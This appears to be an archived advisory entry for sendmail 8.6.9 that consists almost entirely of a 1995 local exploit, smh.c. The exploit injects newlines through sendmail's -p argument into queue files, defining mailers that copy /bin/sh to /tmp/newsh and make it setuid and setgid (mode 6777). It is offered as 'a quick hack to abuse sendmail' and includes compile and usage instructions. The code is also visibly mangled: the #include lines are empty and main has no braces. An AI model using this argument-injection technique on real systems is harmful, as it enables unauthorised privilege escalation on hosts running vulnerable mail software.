COMMAND

    sendmail

SYSTEMS AFFECTED

    systems running sendmail 8.6.9.

PROBLEM

/* smh.c - Michael R. Widner - atreus (2/27/95)

a quick hack to  abuse sendmail 8.6.9 or  whatever else is subject  to
this  hole.   It's  really  just  a  matter  of  passing  newlines  in
arguments to sendmail and getting the stuff into the queue files.   If
we  run  this  locally  with  -odq  we  are guaranteed that it will be
queue, rather than processed immediately.   Wait for the queue to  get
processed automatically or just run sendmail -q if you're impatient.

usage: smh [ username [/path/to/sendmail]]

It's worth noting  that this is  generally only good  for getting bin.
sendmail still wants to  process the sendmail.cf file,  which contains
Ou1 and Og1 most  of the time, limiting  you to bin access.   Is there
a way around this?

cc -o smh smh.c  should do the trick.   This just creates a  bin owned
mode 6777 copy of /bin/sh in /tmp called /tmp/newsh. Note that on some
systems this is pretty much worthless, but you're smart enough to know
which systems those are.  Aren't you?
*/

#include
#include
#include

main(argc, argv)
int argc;
char **argv;

        execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p",
        "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu,
        A=sh -c $u\nR<\ "|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii ",
        argv[1] ? argv[1] : "atreus",0);